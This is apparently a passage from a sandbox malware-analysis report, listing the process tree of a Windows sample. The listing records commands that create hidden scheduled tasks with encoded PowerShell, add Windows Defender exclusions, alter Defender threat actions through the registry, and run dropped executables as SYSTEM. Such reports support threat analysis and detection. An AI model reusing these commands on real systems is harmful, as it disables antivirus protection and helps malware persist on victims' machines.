                                                                                                  7⤵
                                                                                                    PID:960
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "gxtdgAJfr" /SC once /ST 05:51:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                            3⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:3008
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /run /I /tn "gxtdgAJfr"
                                                                                            3⤵
                                                                                              PID:1788
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /DELETE /F /TN "gxtdgAJfr"
                                                                                              3⤵
                                                                                                PID:1152
                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                                                                                3⤵
                                                                                                  PID:2756
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                    4⤵
                                                                                                      PID:812
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                        5⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Drops file in System32 directory
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:480
                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                          6⤵
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:1636
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
                                                                                                    3⤵
                                                                                                      PID:916
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:780
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
                                                                                                      3⤵
                                                                                                        PID:1632
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2888
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
                                                                                                        3⤵
                                                                                                          PID:1328
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
                                                                                                            4⤵
                                                                                                              PID:1528
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
                                                                                                            3⤵
                                                                                                              PID:1744
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
                                                                                                                4⤵
                                                                                                                  PID:1712
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                cmd /C copy nul "C:\Windows\Temp\WPGfhLqOzAIwKSwi\whCLentr\BLuNLJAhAhNCZnIr.wsf"
                                                                                                                3⤵
                                                                                                                  PID:2560
                                                                                                                • C:\Windows\SysWOW64\wscript.exe
                                                                                                                  wscript "C:\Windows\Temp\WPGfhLqOzAIwKSwi\whCLentr\BLuNLJAhAhNCZnIr.wsf"
                                                                                                                  3⤵
                                                                                                                    PID:1992
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
                                                                                                                      4⤵
                                                                                                                      • Windows security bypass
                                                                                                                      PID:2652
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
                                                                                                                      4⤵
                                                                                                                      • Windows security bypass
                                                                                                                      PID:1928
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
                                                                                                                      4⤵
                                                                                                                      • Windows security bypass
                                                                                                                      PID:1344
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
                                                                                                                      4⤵
                                                                                                                      • Windows security bypass
                                                                                                                      PID:2296
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                      4⤵
                                                                                                                      • Windows security bypass
                                                                                                                      PID:2736
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                      4⤵
                                                                                                                      • Windows security bypass
                                                                                                                      PID:1488
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
                                                                                                                      4⤵
                                                                                                                      • Windows security bypass
                                                                                                                      PID:1876
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
                                                                                                                      4⤵
                                                                                                                      • Windows security bypass
                                                                                                                      PID:1708
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                      4⤵
                                                                                                                      • Windows security bypass
                                                                                                                      PID:2564
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                      4⤵
                                                                                                                      • Windows security bypass
                                                                                                                      PID:2924
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                      4⤵
                                                                                                                      • Windows security bypass
                                                                                                                      PID:2256
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                      4⤵
                                                                                                                      • Windows security bypass
                                                                                                                      PID:1556
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                      4⤵
                                                                                                                      • Windows security bypass
                                                                                                                      PID:340
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                      4⤵
                                                                                                                      • Windows security bypass
                                                                                                                      PID:1600
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:32
                                                                                                                      4⤵
                                                                                                                      • Windows security bypass
                                                                                                                      PID:2264
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:64
                                                                                                                      4⤵
                                                                                                                      • Windows security bypass
                                                                                                                      PID:668
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
                                                                                                                      4⤵
                                                                                                                      • Windows security bypass
                                                                                                                      PID:2876
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
                                                                                                                      4⤵
                                                                                                                      • Windows security bypass
                                                                                                                      PID:892
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
                                                                                                                      4⤵
                                                                                                                        PID:696
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
                                                                                                                        4⤵
                                                                                                                          PID:532
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
                                                                                                                          4⤵
                                                                                                                            PID:988
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
                                                                                                                            4⤵
                                                                                                                              PID:2752
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                              4⤵
                                                                                                                                PID:1152
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                4⤵
                                                                                                                                  PID:2108
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                  4⤵
                                                                                                                                    PID:2612
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                    4⤵
                                                                                                                                      PID:2276
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                      4⤵
                                                                                                                                        PID:2756
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                        4⤵
                                                                                                                                          PID:2768
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                                          4⤵
                                                                                                                                            PID:1592
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                                            4⤵
                                                                                                                                              PID:2976
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                              4⤵
                                                                                                                                                PID:2744
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                4⤵
                                                                                                                                                  PID:2604
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                    PID:2652
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    4⤵
                                                                                                                                                      PID:888
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                      4⤵
                                                                                                                                                        PID:816
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                        4⤵
                                                                                                                                                          PID:2368
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 15:42:06 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\bFQwLHu.exe\" GH /kMUhdider 385118 /S" /V1 /F
                                                                                                                                                        3⤵
                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                        PID:2736
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /run /I /tn "XyyyteIMwZeutaZuw"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:2436
                                                                                                                                                      • C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\bFQwLHu.exe
                                                                                                                                                        C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\bFQwLHu.exe GH /kMUhdider 385118 /S
                                                                                                                                                        2⤵
                                                                                                                                                        • Checks computer location settings
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Drops Chrome extension
                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                        PID:2328
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:924
                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:964
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:2132
                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:1808
                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:876
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:944
                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:928
                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:2964
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:2032
                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:2152
                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:2844
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:2544
                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:1308
                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:2040
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:2820
                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                              PID:2904
                                                                                                                                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                  PID:1524
                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:892
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:296
                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:996
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:1008
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                        PID:2540
                                                                                                                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                          PID:780
                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:2148
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:2888
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
